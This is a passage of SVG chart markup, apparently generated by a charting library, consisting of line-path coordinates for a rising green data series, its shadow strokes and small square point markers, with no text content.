233.79288074666627 L 156.71507352941177 233.79288074666627 L 158.24310661764707 233.79288074666627 L 159.77113970588235 233.79288074666627 L 161.29917279411765 233.79288074666627 L 162.82720588235296 233.79288074666627 L 164.35523897058823 233.79288074666627 L 165.88327205882354 232.36213514666628 L 167.41130514705884 232.36213514666628 L 168.93933823529412 232.36213514666628 L 170.46737132352942 232.36213514666628 L 171.99540441176472 232.36213514666628 L 173.5234375 232.36213514666628 L 175.0514705882353 232.36213514666628 L 176.5795036764706 232.36213514666628 L 178.10753676470588 232.36213514666628 L 179.6355698529412 232.36213514666628 L 181.1636029411765 232.36213514666628 L 182.69163602941177 232.36213514666628 L 184.21966911764707 232.36213514666628 L 185.74770220588235 232.36213514666628 L 187.27573529411765 232.36213514666628 L 188.80376838235296 232.36213514666628 L 190.33180147058823 232.36213514666628 L 191.85983455882354 232.36213514666628 L 193.38786764705884 232.36213514666628 L 194.91590073529412 232.36213514666628 L 196.44393382352942 232.12509834666628 L 197.97196691176472 232.12509834666628 L 199.5 232.12509834666628 L 201.0280330882353 232.12509834666628 L 202.5560661764706 232.12509834666628 L 204.08409926470588 232.12509834666628 L 205.6121323529412 232.12509834666628 L 207.1401654411765 232.12509834666628 L 208.66819852941177 232.12509834666628 L 210.19623161764707 231.96030133333255 L 211.72426470588235 231.96030133333255 L 213.25229779411765 231.96030133333255 L 214.78033088235296 231.96030133333255 L 216.30836397058823 231.96030133333255 L 217.83639705882354 231.96030133333255 L 219.36443014705884 231.96030133333255 L 220.89246323529412 231.96030133333255 L 222.42049632352942 231.96030133333255 L 223.94852941176472 231.29217013333255 L 225.4765625 231.29217013333255 L 227.0045955882353 231.29217013333255 L 228.5326286764706 231.29217013333255 L 230.06066176470588 231.29217013333255 L 231.5886948529412 231.29217013333255 L 233.1167279411765 231.29217013333255 L 234.64476102941177 231.29217013333255 L 236.17279411764707 231.29217013333255 L 237.70082720588238 231.29217013333255 L 239.22886029411765 231.29217013333255 L 240.75689338235296 231.29217013333255 L 242.28492647058823 231.29217013333255 L 243.81295955882354 231.29217013333255 L 245.34099264705884 231.29217013333255 L 246.86902573529412 231.29217013333255 L 248.39705882352942 231.29217013333255 L 249.92509191176472 231.29217013333255 L 251.453125 231.02204053333253 L 252.9811580882353 231.02204053333253 L 254.5091911764706 231.02204053333253 L 256.0372242647059 231.02204053333253 L 257.56525735294116 230.37344533333254 L 259.09329044117646 230.37344533333254 L 260.62132352941177 230.02435477333256 L 262.1493566176471 229.41483157333255 L 263.6773897058824 228.30106645333254 L 265.2054227941177 228.30106645333254 L 266.7334558823529 228.30106645333254 L 268.26148897058823 228.30106645333254 L 269.78952205882354 228.30106645333254 L 271.31755514705884 228.30106645333254 L 272.84558823529414 228.30106645333254 L 274.37362132352945 228.30106645333254 L 275.9016544117647 228.30106645333254 L 277.4296875 228.30106645333254 L 278.9577205882353 228.30106645333254 L 280.4857536764706 228.30106645333254 L 282.0137867647059 228.30106645333254 L 283.54181985294116 228.30106645333254 L 285.06985294117646 228.30106645333254 L 286.59788602941177 228.30106645333254 L 288.1259191176471 228.30106645333254 L 289.6539522058824 228.30106645333254 L 291.1819852941177 228.30106645333254 L 292.7100183823529 227.77359445333252 L 294.23805147058823 225.24279445333252 L 295.76608455882354 225.24279445333252 L 297.29411764705884 225.24279445333252 L 298.82215073529414 225.24279445333252 L 300.35018382352945 225.24279445333252 L 301.8782169117647 225.24279445333252 L 303.40625 225.24279445333252 L 304.9342830882353 225.24279445333252 L 306.4623161764706 224.58247765333255 L 307.9903492647059 223.98665333333253 L 309.51838235294116 223.98665333333253 L 311.04641544117646 223.98665333333253 L 312.57444852941177 223.98665333333253 L 314.1024816176471 223.44000053333255 L 315.6305147058824 221.36137013333254 L 317.1585477941177 217.84489013333254 L 318.6865808823529 215.77719989333252 L 320.21461397058823 215.77719989333252 L 321.74264705882354 211.94388149333253 L 323.27068014705884 211.94388149333253 L 324.79871323529414 211.94388149333253 L 326.32674632352945 211.94388149333253 L 327.8547794117647 210.98739893333254 L 329.3828125 210.98739893333254 L 330.9108455882353 210.98739893333254 L 332.4388786764706 209.79051701333253 L 333.9669117647059 208.71225610666627 L 335.4949448529412 206.47733770666628 L 337.02297794117646 204.56067850666628 L 338.55101102941177 203.49792010666627 L 340.0790441176471 203.49792010666627 L 341.6070772058824 203.49792010666627 L 343.1351102941177 203.49792010666627 L 344.6631433823529 203.49792010666627 L 346.19117647058823 201.6082561066663 L 347.71920955882354 200.60943370666627 L 349.24724264705884 199.62410890666627 L 350.77527573529414 196.54665610666626 L 352.30330882352945 192.5378689066663 L 353.8313419117647 192.5378689066663 L 355.359375 192.5378689066663 L 356.8874080882353 191.85723466666627 L 358.4154411764706 186.67415626666627 L 359.9434742647059 182.24126026666627 L 361.4715073529412 178.77308746666625 L 362.99954044117646 176.15135626666626 L 364.52757352941177 176.15135626666626 L 366.0556066176471 176.15135626666626 L 367.5836397058824 175.48817418666627 L 369.1116727941177 174.0304333866663 L 370.6397058823529 174.0304333866663 L 372.16773897058823 174.0304333866663 L 373.69577205882354 173.3420557866663 L 375.22380514705884 171.92480778666626 L 376.75183823529414 170.85174858666628 L 378.27987132352945 169.07006538666627 L 379.8079044117647 167.19880074666628 L 381.3359375 163.68942474666628 L 382.8639705882353 162.98754954666626 L 384.3920036764706 160.86530058666628 L 385.9200367647059 160.40975658666628 L 387.4480698529412 160.40975658666628 L 388.97610294117646 160.40975658666628 L 390.50413602941177 160.40975658666628 L 392.0321691176471 160.40975658666628 L 393.5602022058824 159.0116893866663 L 395.0882352941177 157.27035690666628" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.192608 L 118.51424632352942 236.192608 L 120.04227941176471 236.192608 L 121.5703125 236.192608 L 123.0983455882353 236.192608 L 124.6263786764706 236.192608 L 126.15441176470588 236.192608 L 127.68244485294119 235.82870954666626 L 129.21047794117646 234.65441834666626 L 130.73851102941177 234.65441834666626 L 132.26654411764707 234.65441834666626 L 133.79457720588235 234.65441834666626 L 135.32261029411765 234.65441834666626 L 136.85064338235296 234.65441834666626 L 138.37867647058823 234.65441834666626 L 139.90670955882354 234.65441834666626 L 141.43474264705884 234.65441834666626 L 142.96277573529412 234.65441834666626 L 144.49080882352942 233.79288074666627 L 146.01884191176472 233.79288074666627 L 147.546875 233.79288074666627 L 149.0749080882353 233.79288074666627 L 150.6029411764706 233.79288074666627 L 152.13097426470588 233.79288074666627 L 153.6590073529412 233.79288074666627 L 155.18704044117646 233.79288074666627 L 156.71507352941177 233.79288074666627 L 158.24310661764707 233.79288074666627 L 159.77113970588235 233.79288074666627 L 161.29917279411765 233.79288074666627 L 162.82720588235296 233.79288074666627 L 164.35523897058823 233.79288074666627 L 165.88327205882354 232.36213514666628 L 167.41130514705884 232.36213514666628 L 168.93933823529412 232.36213514666628 L 170.46737132352942 232.36213514666628 L 171.99540441176472 232.36213514666628 L 173.5234375 232.36213514666628 L 175.0514705882353 232.36213514666628 L 176.5795036764706 232.36213514666628 L 178.10753676470588 232.36213514666628 L 179.6355698529412 232.36213514666628 L 181.1636029411765 232.36213514666628 L 182.69163602941177 232.36213514666628 L 184.21966911764707 232.36213514666628 L 185.74770220588235 232.36213514666628 L 187.27573529411765 232.36213514666628 L 188.80376838235296 232.36213514666628 L 190.33180147058823 232.36213514666628 L 191.85983455882354 232.36213514666628 L 193.38786764705884 232.36213514666628 L 194.91590073529412 232.36213514666628 L 196.44393382352942 232.12509834666628 L 197.97196691176472 232.12509834666628 L 199.5 232.12509834666628 L 201.0280330882353 232.12509834666628 L 202.5560661764706 232.12509834666628 L 204.08409926470588 232.12509834666628 L 205.6121323529412 232.12509834666628 L 207.1401654411765 232.12509834666628 L 208.66819852941177 232.12509834666628 L 210.19623161764707 231.96030133333255 L 211.72426470588235 231.96030133333255 L 213.25229779411765 231.96030133333255 L 214.78033088235296 231.96030133333255 L 216.30836397058823 231.96030133333255 L 217.83639705882354 231.96030133333255 L 219.36443014705884 231.96030133333255 L 220.89246323529412 231.96030133333255 L 222.42049632352942 231.96030133333255 L 223.94852941176472 231.29217013333255 L 225.4765625 231.29217013333255 L 227.0045955882353 231.29217013333255 L 228.5326286764706 231.29217013333255 L 230.06066176470588 231.29217013333255 L 231.5886948529412 231.29217013333255 L 233.1167279411765 231.29217013333255 L 234.64476102941177 231.29217013333255 L 236.17279411764707 231.29217013333255 L 237.70082720588238 231.29217013333255 L 239.22886029411765 231.29217013333255 L 240.75689338235296 231.29217013333255 L 242.28492647058823 231.29217013333255 L 243.81295955882354 231.29217013333255 L 245.34099264705884 231.29217013333255 L 246.86902573529412 231.29217013333255 L 248.39705882352942 231.29217013333255 L 249.92509191176472 231.29217013333255 L 251.453125 231.02204053333253 L 252.9811580882353 231.02204053333253 L 254.5091911764706 231.02204053333253 L 256.0372242647059 231.02204053333253 L 257.56525735294116 230.37344533333254 L 259.09329044117646 230.37344533333254 L 260.62132352941177 230.02435477333256 L 262.1493566176471 229.41483157333255 L 263.6773897058824 228.30106645333254 L 265.2054227941177 228.30106645333254 L 266.7334558823529 228.30106645333254 L 268.26148897058823 228.30106645333254 L 269.78952205882354 228.30106645333254 L 271.31755514705884 228.30106645333254 L 272.84558823529414 228.30106645333254 L 274.37362132352945 228.30106645333254 L 275.9016544117647 228.30106645333254 L 277.4296875 228.30106645333254 L 278.9577205882353 228.30106645333254 L 280.4857536764706 228.30106645333254 L 282.0137867647059 228.30106645333254 L 283.54181985294116 228.30106645333254 L 285.06985294117646 228.30106645333254 L 286.59788602941177 228.30106645333254 L 288.1259191176471 228.30106645333254 L 289.6539522058824 228.30106645333254 L 291.1819852941177 228.30106645333254 L 292.7100183823529 227.77359445333252 L 294.23805147058823 225.24279445333252 L 295.76608455882354 225.24279445333252 L 297.29411764705884 225.24279445333252 L 298.82215073529414 225.24279445333252 L 300.35018382352945 225.24279445333252 L 301.8782169117647 225.24279445333252 L 303.40625 225.24279445333252 L 304.9342830882353 225.24279445333252 L 306.4623161764706 224.58247765333255 L 307.9903492647059 223.98665333333253 L 309.51838235294116 223.98665333333253 L 311.04641544117646 223.98665333333253 L 312.57444852941177 223.98665333333253 L 314.1024816176471 223.44000053333255 L 315.6305147058824 221.36137013333254 L 317.1585477941177 217.84489013333254 L 318.6865808823529 215.77719989333252 L 320.21461397058823 215.77719989333252 L 321.74264705882354 211.94388149333253 L 323.27068014705884 211.94388149333253 L 324.79871323529414 211.94388149333253 L 326.32674632352945 211.94388149333253 L 327.8547794117647 210.98739893333254 L 329.3828125 210.98739893333254 L 330.9108455882353 210.98739893333254 L 332.4388786764706 209.79051701333253 L 333.9669117647059 208.71225610666627 L 335.4949448529412 206.47733770666628 L 337.02297794117646 204.56067850666628 L 338.55101102941177 203.49792010666627 L 340.0790441176471 203.49792010666627 L 341.6070772058824 203.49792010666627 L 343.1351102941177 203.49792010666627 L 344.6631433823529 203.49792010666627 L 346.19117647058823 201.6082561066663 L 347.71920955882354 200.60943370666627 L 349.24724264705884 199.62410890666627 L 350.77527573529414 196.54665610666626 L 352.30330882352945 192.5378689066663 L 353.8313419117647 192.5378689066663 L 355.359375 192.5378689066663 L 356.8874080882353 191.85723466666627 L 358.4154411764706 186.67415626666627 L 359.9434742647059 182.24126026666627 L 361.4715073529412 178.77308746666625 L 362.99954044117646 176.15135626666626 L 364.52757352941177 176.15135626666626 L 366.0556066176471 176.15135626666626 L 367.5836397058824 175.48817418666627 L 369.1116727941177 174.0304333866663 L 370.6397058823529 174.0304333866663 L 372.16773897058823 174.0304333866663 L 373.69577205882354 173.3420557866663 L 375.22380514705884 171.92480778666626 L 376.75183823529414 170.85174858666628 L 378.27987132352945 169.07006538666627 L 379.8079044117647 167.19880074666628 L 381.3359375 163.68942474666628 L 382.8639705882353 162.98754954666626 L 384.3920036764706 160.86530058666628 L 385.9200367647059 160.40975658666628 L 387.4480698529412 160.40975658666628 L 388.97610294117646 160.40975658666628 L 390.50413602941177 160.40975658666628 L 392.0321691176471 160.40975658666628 L 393.5602022058824 159.0116893866663 L 395.0882352941177 157.27035690666628" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.192608 L 118.51424632352942 236.192608 L 120.04227941176471 236.192608 L 121.5703125 236.192608 L 123.0983455882353 236.192608 L 124.6263786764706 236.192608 L 126.15441176470588 236.192608 L 127.68244485294119 235.82870954666626 L 129.21047794117646 234.65441834666626 L 130.73851102941177 234.65441834666626 L 132.26654411764707 234.65441834666626 L 133.79457720588235 234.65441834666626 L 135.32261029411765 234.65441834666626 L 136.85064338235296 234.65441834666626 L 138.37867647058823 234.65441834666626 L 139.90670955882354 234.65441834666626 L 141.43474264705884 234.65441834666626 L 142.96277573529412 234.65441834666626 L 144.49080882352942 233.79288074666627 L 146.01884191176472 233.79288074666627 L 147.546875 233.79288074666627 L 149.0749080882353 233.79288074666627 L 150.6029411764706 233.79288074666627 L 152.13097426470588 233.79288074666627 L 153.6590073529412 233.79288074666627 L 155.18704044117646 233.79288074666627 L 156.71507352941177 233.79288074666627 L 158.24310661764707 233.79288074666627 L 159.77113970588235 233.79288074666627 L 161.29917279411765 233.79288074666627 L 162.82720588235296 233.79288074666627 L 164.35523897058823 233.79288074666627 L 165.88327205882354 232.36213514666628 L 167.41130514705884 232.36213514666628 L 168.93933823529412 232.36213514666628 L 170.46737132352942 232.36213514666628 L 171.99540441176472 232.36213514666628 L 173.5234375 232.36213514666628 L 175.0514705882353 232.36213514666628 L 176.5795036764706 232.36213514666628 L 178.10753676470588 232.36213514666628 L 179.6355698529412 232.36213514666628 L 181.1636029411765 232.36213514666628 L 182.69163602941177 232.36213514666628 L 184.21966911764707 232.36213514666628 L 185.74770220588235 232.36213514666628 L 187.27573529411765 232.36213514666628 L 188.80376838235296 232.36213514666628 L 190.33180147058823 232.36213514666628 L 191.85983455882354 232.36213514666628 L 193.38786764705884 232.36213514666628 L 194.91590073529412 232.36213514666628 L 196.44393382352942 232.12509834666628 L 197.97196691176472 232.12509834666628 L 199.5 232.12509834666628 L 201.0280330882353 232.12509834666628 L 202.5560661764706 232.12509834666628 L 204.08409926470588 232.12509834666628 L 205.6121323529412 232.12509834666628 L 207.1401654411765 232.12509834666628 L 208.66819852941177 232.12509834666628 L 210.19623161764707 231.96030133333255 L 211.72426470588235 231.96030133333255 L 213.25229779411765 231.96030133333255 L 214.78033088235296 231.96030133333255 L 216.30836397058823 231.96030133333255 L 217.83639705882354 231.96030133333255 L 219.36443014705884 231.96030133333255 L 220.89246323529412 231.96030133333255 L 222.42049632352942 231.96030133333255 L 223.94852941176472 231.29217013333255 L 225.4765625 231.29217013333255 L 227.0045955882353 231.29217013333255 L 228.5326286764706 231.29217013333255 L 230.06066176470588 231.29217013333255 L 231.5886948529412 231.29217013333255 L 233.1167279411765 231.29217013333255 L 234.64476102941177 231.29217013333255 L 236.17279411764707 231.29217013333255 L 237.70082720588238 231.29217013333255 L 239.22886029411765 231.29217013333255 L 240.75689338235296 231.29217013333255 L 242.28492647058823 231.29217013333255 L 243.81295955882354 231.29217013333255 L 245.34099264705884 231.29217013333255 L 246.86902573529412 231.29217013333255 L 248.39705882352942 231.29217013333255 L 249.92509191176472 231.29217013333255 L 251.453125 231.02204053333253 L 252.9811580882353 231.02204053333253 L 254.5091911764706 231.02204053333253 L 256.0372242647059 231.02204053333253 L 257.56525735294116 230.37344533333254 L 259.09329044117646 230.37344533333254 L 260.62132352941177 230.02435477333256 L 262.1493566176471 229.41483157333255 L 263.6773897058824 228.30106645333254 L 265.2054227941177 228.30106645333254 L 266.7334558823529 228.30106645333254 L 268.26148897058823 228.30106645333254 L 269.78952205882354 228.30106645333254 L 271.31755514705884 228.30106645333254 L 272.84558823529414 228.30106645333254 L 274.37362132352945 228.30106645333254 L 275.9016544117647 228.30106645333254 L 277.4296875 228.30106645333254 L 278.9577205882353 228.30106645333254 L 280.4857536764706 228.30106645333254 L 282.0137867647059 228.30106645333254 L 283.54181985294116 228.30106645333254 L 285.06985294117646 228.30106645333254 L 286.59788602941177 228.30106645333254 L 288.1259191176471 228.30106645333254 L 289.6539522058824 228.30106645333254 L 291.1819852941177 228.30106645333254 L 292.7100183823529 227.77359445333252 L 294.23805147058823 225.24279445333252 L 295.76608455882354 225.24279445333252 L 297.29411764705884 225.24279445333252 L 298.82215073529414 225.24279445333252 L 300.35018382352945 225.24279445333252 L 301.8782169117647 225.24279445333252 L 303.40625 225.24279445333252 L 304.9342830882353 225.24279445333252 L 306.4623161764706 224.58247765333255 L 307.9903492647059 223.98665333333253 L 309.51838235294116 223.98665333333253 L 311.04641544117646 223.98665333333253 L 312.57444852941177 223.98665333333253 L 314.1024816176471 223.44000053333255 L 315.6305147058824 221.36137013333254 L 317.1585477941177 217.84489013333254 L 318.6865808823529 215.77719989333252 L 320.21461397058823 215.77719989333252 L 321.74264705882354 211.94388149333253 L 323.27068014705884 211.94388149333253 L 324.79871323529414 211.94388149333253 L 326.32674632352945 211.94388149333253 L 327.8547794117647 210.98739893333254 L 329.3828125 210.98739893333254 L 330.9108455882353 210.98739893333254 L 332.4388786764706 209.79051701333253 L 333.9669117647059 208.71225610666627 L 335.4949448529412 206.47733770666628 L 337.02297794117646 204.56067850666628 L 338.55101102941177 203.49792010666627 L 340.0790441176471 203.49792010666627 L 341.6070772058824 203.49792010666627 L 343.1351102941177 203.49792010666627 L 344.6631433823529 203.49792010666627 L 346.19117647058823 201.6082561066663 L 347.71920955882354 200.60943370666627 L 349.24724264705884 199.62410890666627 L 350.77527573529414 196.54665610666626 L 352.30330882352945 192.5378689066663 L 353.8313419117647 192.5378689066663 L 355.359375 192.5378689066663 L 356.8874080882353 191.85723466666627 L 358.4154411764706 186.67415626666627 L 359.9434742647059 182.24126026666627 L 361.4715073529412 178.77308746666625 L 362.99954044117646 176.15135626666626 L 364.52757352941177 176.15135626666626 L 366.0556066176471 176.15135626666626 L 367.5836397058824 175.48817418666627 L 369.1116727941177 174.0304333866663 L 370.6397058823529 174.0304333866663 L 372.16773897058823 174.0304333866663 L 373.69577205882354 173.3420557866663 L 375.22380514705884 171.92480778666626 L 376.75183823529414 170.85174858666628 L 378.27987132352945 169.07006538666627 L 379.8079044117647 167.19880074666628 L 381.3359375 163.68942474666628 L 382.8639705882353 162.98754954666626 L 384.3920036764706 160.86530058666628 L 385.9200367647059 160.40975658666628 L 387.4480698529412 160.40975658666628 L 388.97610294117646 160.40975658666628 L 390.50413602941177 160.40975658666628 L 392.0321691176471 160.40975658666628 L 393.5602022058824 159.0116893866663 L 395.0882352941177 157.27035690666628" fill="none" stroke="#55BF3B" stroke-width="2"></path><path d="M 392.172 154.672 L 397.828 154.672 397.828 160.328 392.172 160.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 390.672 156.172 L 396.328 156.172 396.328 161.828 390.672 161.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 389.172 157.672 L 394.828 157.672 394.828 163.328 389.172 163.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 387.672 157.672 L 393.328 157.672 393.328 163.328 387.672 163.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 386.172 157.672 L 391.828 157.672 391.828 163.328 386.172 163.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 384.672 157.672 L 390.328 157.672 390.328 163.328 384.672 163.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 383.172 157.672 L 388.828 157.672 388.828 163.328 383.172 163.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 381.672 158.172 L 387.328 158.172 387.328 163.828 381.672 163.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 380.172 160.172 L 385.828 160.172 385.828 165.828 380.172 165.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 378.672 160.672 L 384.328 160.672 384.328 166.328 378.672 166.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 377.172 164.172 L 382.828 164.172 382.828 169.828 377.172 169.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 375.672 166.172 L 381.328 166.172 381.328 171.828 375.672 171.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 374.172 168.172 L 379.828 168.172 379.828 173.828 374.172 173.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 372.172 169.172 L 377.828 169.172 377.828 174.828 372.172 174.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 370.672 170.672 L 376.328 170.672 376.328 176.328 370.672 176.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 369.172 171.172 L 374.828 171.172 374.828 176.828 369.172 176.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 367.672 171.172 L 373.328 171.172 373.328 176.828 367.672 176.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 366.172 171.172 L 371.828 171.172 371.828 176.828 366.172 176.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 364.672 172.672 L 370.328 172.672 370.328 178.328 364.672 178.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 363.172 173.172 L 368.828 173.172 368.828 178.828 363.172 178.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 361.672 173.172 L 367.328 173.172 367.328 178.828 361.672 178.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 360.172 173.172 L 365.828 173.172 365.828 178.828 360.172 178.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 358.672 176.172 L 364.328 176.172 364.328 181.828 358.672 181.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 357.172 179.172 L 362.828 179.172 362.828 184.828 357.172 184.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 355.672 183.672 L 361.328 183.672 361.328 189.328 355.672 189.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 354.172 189.172 L 359.828 189.172 359.828 194.828 354.172 194.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 352.672 189.672 L 358.328 189.672 358.328 195.328 352.672 195.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 351.172 189.672 L 356.828 189.672 356.828 195.328 351.172 195.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 349.672 189.672 L 355.328 189.672 355.328 195.328 349.672 195.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 348.172 193.672 L 353.828 193.672 353.828 199.328 348.172 199.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 346.172 196.672 L 351.828 196.672 351.828 202.328 346.172 202.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 344.672 197.672 L 350.328 197.672 350.328 203.328 344.672 203.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 343.172 198.672 L 348.828 198.672 348.828 204.328 343.172 204.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 341.672 200.672 L 347.328 200.672 347.328 206.328 341.672 206.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 340.172 200.672 L 345.828 200.672 345.828 206.328 340.172 206.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 338.672 200.672 L 344.328 200.672 344.328 206.328 338.672 206.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 337.172 200.672 L 342.828 200.672 342.828 206.328 337.172 206.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 335.672 200.672 L 341.328 200.672 341.328 206.328 335.672 206.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 334.172 201.672 L 339.828 201.672 339.828 207.328 334.172 207.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 332.672 203.672 L 338.328 203.672 338.328 209.328 332.672 209.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 331.172 205.672 L 336.828 205.672 336.828 211.328 331.172 211.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 329.672 207.172 L 335.328 207.172 335.328 212.828 329.672 212.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 328.172 208.172 L 333.828 208.172 333.828 213.828 328.172 213.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 326.672 208.172 L 332.328 208.172 332.328 213.828 326.672 213.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 325.172 208.172 L 330.828 208.172 330.828 213.828 325.172 213.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 323.672 209.172 L 329.328 209.172 329.328 214.828 323.672 214.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 322.172 209.172 L 327.828 209.172 327.828 214.828 322.172 214.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 320.672 209.172 L 326.328 209.172 326.328 214.828 320.672 214.828 Z" 